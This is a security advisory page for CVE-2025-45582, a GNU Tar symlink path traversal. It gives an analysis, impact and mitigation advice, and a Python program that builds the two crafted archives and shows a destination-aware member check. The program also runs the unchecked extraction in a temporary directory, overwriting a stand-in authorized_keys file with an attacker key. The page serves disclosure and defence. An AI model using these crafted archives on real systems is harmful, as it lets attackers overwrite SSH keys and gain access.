CVE-2025-45582: CWE-24 Path Traversal: '../filedir' in GNU Tar
GNU Tar through 1.35 allows file overwrite via directory traversal in crafted TAR archives, using a two-step process. First, the victim extracts an archive that contains a symlink whose target uses ../ to reach a critical directory. Second, the victim extracts, into the same directory, an archive that contains a critical file specified via a relative pathname that begins with the symlink name and ends with that critical file's name. The extraction follows the symlink and overwrites the critical file. This bypasses the "Member name contains '..'" protection that would trigger for a single TAR archive attempting to reach the critical file via a ../ path. For example, the first archive can contain "x -> ../../../../../home/victim/.ssh" and the second archive can contain x/authorized_keys. This can affect server applications that automatically extract any number of user-supplied TAR archives and rely on the blocking of traversal. It can also affect software installation processes in which "tar xf" is run more than once (e.g., when installing a package automatically installs two dependencies that are distributed as untrusted tarballs instead of official packages). NOTE: the Security Rules of Thumb in the official GNU Tar manual call for each "tar xf" to be run in an otherwise-empty directory; however, third-party advice leads users to run "tar xf" more than once into the same directory.
AI Analysis
Technical Summary
CVE-2025-45582 is a path traversal weakness (CWE-24) in GNU Tar through 1.35. GNU Tar's traversal protection is a check on member names: any member whose name contains a '..' component is refused with "Member name contains '..'". Within a single run, tar also defers creating symlink members until the regular files have been written, so a symlink and a path through it in the same archive do not combine. What tar does not do is look at where a symlink that already exists in the destination directory leads. The check is purely syntactic and holds no state between runs.

The attack therefore uses two archives extracted into the same directory. The first contains a symlink entry such as 'x -> ../../../../../home/victim/.ssh'. Its member name is only 'x', so the '..' check does not fire, and tar creates a symlink that points outside the extraction directory. The second archive contains a regular file member named 'x/authorized_keys'. That name also contains no '..', so it passes, but opening it for writing follows the existing symlink and overwrites /home/victim/.ssh/authorized_keys. Any file writable by the extracting user can be targeted in the same way.

The weakness matters wherever more than one untrusted archive lands in the same directory: server applications that unpack user-supplied TAR files, CI/CD jobs that unpack several artifacts into one workspace, and installers or dependency fetchers that run 'tar xf' repeatedly on tarballs instead of installing verified packages. The attacker needs to get both archives extracted, in order, by the victim or by an automated process acting on the victim's behalf. The CVSS 3.1 base score is 4.1 (medium), reflecting the multiple steps and user interaction required and the limited confidentiality impact; the integrity and availability impact comes from the file overwrite itself. No public exploit is known at this time, and the CVE text names no fixed version, so the defence is operational: extract each archive into an otherwise-empty directory, as the GNU Tar manual's Security Rules of Thumb already advise.
Potential Impact
For European organizations the primary impact is unauthorized modification of files the extracting user can write, most obviously SSH authorized_keys, which gives an attacker remote access as that user and a foothold for privilege escalation. Shell start-up files, cron entries and CI configuration are equally reachable targets. Integrity and availability of affected hosts are at risk, particularly in environments that automatically extract several TAR archives from untrusted sources into one location: CI/CD pipelines, package or plugin management systems, and multi-stage deployment processes. The same overwrite can corrupt software installation or update processes and cause outages. Confidentiality is not directly affected, since the weakness writes files rather than reading them, but the access gained from an overwritten key file can lead to further compromise. Organizations that use GNU Tar extensively in automated workflows or shared directories are at higher risk. The medium severity reflects the two ordered extractions the attack needs; the ability to overwrite a critical file nonetheless makes it a significant operational concern.
Mitigation Recommendations
To mitigate CVE-2025-45582, European organizations should:
1) Extract every archive into a fresh, otherwise-empty directory, as the GNU Tar manual's Security Rules of Thumb advise, and never unpack a second archive into a directory that already holds the contents of a first one. If reuse is unavoidable, clear the directory, or at least remove or reject any symlinks in it, before each extraction.
2) Track GNU Tar releases. The CVE text names no fixed version and lists all releases through 1.35 as affected, so treat an upgrade as complementary to the operational controls here rather than a substitute for them.
3) Validate archive contents before extraction: list members (tar -tvf) and reject absolute paths, '..' components, and symlink or hard-link entries, or at least link entries whose target leaves the destination. Resolve each member path against the destination as it exists on disk, not just syntactically, so that a path through an existing symlink is caught.
4) Extract untrusted archives in a container or sandbox, as a dedicated low-privilege user whose home directory contains no SSH keys, start-up files or other sensitive writable targets.
5) Employ file integrity monitoring on critical directories (e.g., ~/.ssh) to detect unauthorized modifications.
6) Where possible, replace automated extraction of user-supplied TAR files with package management or artifact verification mechanisms that check signatures before anything is written to disk.
7) Educate system administrators and developers about the risks of repeated 'tar xf' commands on untrusted archives and point them to the official GNU Tar security guidelines.
8) Log and audit extraction activity; a symlink member in an archive, or an archive whose member paths start with the name of an existing symlink in the destination, is a pattern worth alerting on.
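The following Python program is an added example, not code from this page, from MITRE or from the GNU Tar project. It uses the standard tarfile module to stage the two-archive sequence described in the Technical Summary in a temporary directory and to exercise the kind of pre-extraction check called for in mitigation 3: it builds both archives in memory, shows that a check for '..' in member names passes both, shows that resolving member paths against the destination as it exists on disk rejects the second archive only once the first has planted its symlink, and finally performs the unchecked extraction so the overwrite is visible. All names, the key strings and the ../victim/.ssh depth (shortened to fit the temporary layout) are constructed assumptions; the extractor here is Python's tarfile, used as a stand-in for any tool that writes through an existing symlink, not GNU tar itself.

```python
"""CVE-2025-45582 two-archive sequence plus a destination-aware member check (constructed example)."""
import io
import os
import shutil
import tarfile
import tempfile


def build_archive(members):
    """Build an in-memory tar from (name, kind, payload) tuples.
    kind is "file" (payload = contents) or "symlink" (payload = link target)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, kind, payload in members:
            info = tarfile.TarInfo(name)
            if kind == "symlink":
                info.type = tarfile.SYMTYPE
                info.linkname = payload
                tf.addfile(info)
            else:
                data = payload.encode()
                info.size = len(data)
                tf.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf


def members_of(archive):
    """Read the member headers without extracting anything."""
    archive.seek(0)
    with tarfile.open(fileobj=archive, mode="r") as tf:
        return tf.getmembers()


def naive_dotdot_check(member):
    """The check the CVE text describes: a literal '..' component in the member name."""
    return ".." in member.name.split("/")


def check_member(member, dest):
    """Return None if member is safe to extract into dest, else a reason string.
    Paths are resolved against dest as it exists on disk right now, so a symlink
    left behind by an earlier extraction is detected."""
    dest = os.path.realpath(dest)
    name = member.name
    if os.path.isabs(name) or ".." in name.split("/"):
        return "absolute or ../ member name"
    target = os.path.realpath(os.path.join(dest, name))
    if os.path.commonpath([target, dest]) != dest:
        return "member path resolves outside destination: " + target
    if member.issym() or member.islnk():
        if os.path.isabs(member.linkname):
            return "absolute link target"
        # symlink targets are relative to the link's directory, hard links to the archive root
        base = os.path.dirname(name) if member.issym() else ""
        ltarget = os.path.realpath(os.path.join(dest, base, member.linkname))
        if os.path.commonpath([ltarget, dest]) != dest:
            return "link target resolves outside destination: " + ltarget
    return None


def audit(archive, dest):
    """Map member name -> problem (or None) for extraction into dest."""
    return {m.name: check_member(m, dest) for m in members_of(archive)}


def extract_unchecked(archive, dest):
    """Extract the way an unhardened pipeline would: no filtering at all."""
    archive.seek(0)
    with tarfile.open(fileobj=archive, mode="r") as tf:
        try:
            tf.extractall(dest, filter="fully_trusted")
        except TypeError:  # Python release without the filter argument
            tf.extractall(dest)


def demo():
    """Run the two-step sequence in a temp tree and report what each check saw."""
    root = tempfile.mkdtemp()
    ssh_dir = os.path.join(root, "victim", ".ssh")
    os.makedirs(ssh_dir)
    key_file = os.path.join(ssh_dir, "authorized_keys")
    with open(key_file, "w") as f:
        f.write("ssh-ed25519 AAAA...legit victim@host\n")  # placeholder key, constructed
    dest = os.path.join(root, "extract")
    clean = os.path.join(root, "clean")
    os.makedirs(dest)
    os.makedirs(clean)
    # Archive 1: symlink out of the tree; depth matches this temp layout
    # (the CVE text uses ../../../../../home/victim/.ssh).
    first = build_archive([("x", "symlink", "../victim/.ssh")])
    # Archive 2: an innocent-looking path through the symlink name, no '..' anywhere.
    second = build_archive([("x/authorized_keys", "file", "ssh-ed25519 AAAA...attacker\n")])
    r = {}
    r["naive_blocks_first"] = any(naive_dotdot_check(m) for m in members_of(first))
    r["naive_blocks_second"] = any(naive_dotdot_check(m) for m in members_of(second))
    r["audit_first"] = audit(first, dest)                  # link target flagged
    r["audit_second_in_clean_dir"] = audit(second, clean)  # nothing to flag in isolation
    extract_unchecked(first, dest)                         # pipeline unpacks archive 1 anyway
    r["symlink_planted"] = os.path.islink(os.path.join(dest, "x"))
    r["audit_second"] = audit(second, dest)                # now x/ resolves outside dest
    extract_unchecked(second, dest)                        # the write follows the symlink
    with open(key_file) as f:
        r["authorized_keys_after"] = f.read()
    shutil.rmtree(root, ignore_errors=True)
    return r


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "->", v)
```

Run it directly to print each result. The audit_second_in_clean_dir entry is the point practitioners most often miss: inspecting archive 2 on its own finds nothing wrong, which is why a content check has to run against the actual destination immediately before each extraction, and why a fresh directory per archive is the simpler fix. Recent Python releases offer tarfile's filter="data" extraction mode, which applies comparable destination checks; GNU tar 1.35 and earlier do not, which is the substance of this CVE.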
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Italy, Spain, Poland
Technical Details
- Data Version: 5.1
- Assigner Short Name: mitre
- Date Reserved: 2025-04-22T00:00:00.000Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 6871435da83201eaacafb6f2
Added to database: 7/11/2025, 5:01:17 PM
Last enriched: 11/2/2025, 4:07:04 AM
Last updated: 12/16/2025, 9:27:27 AM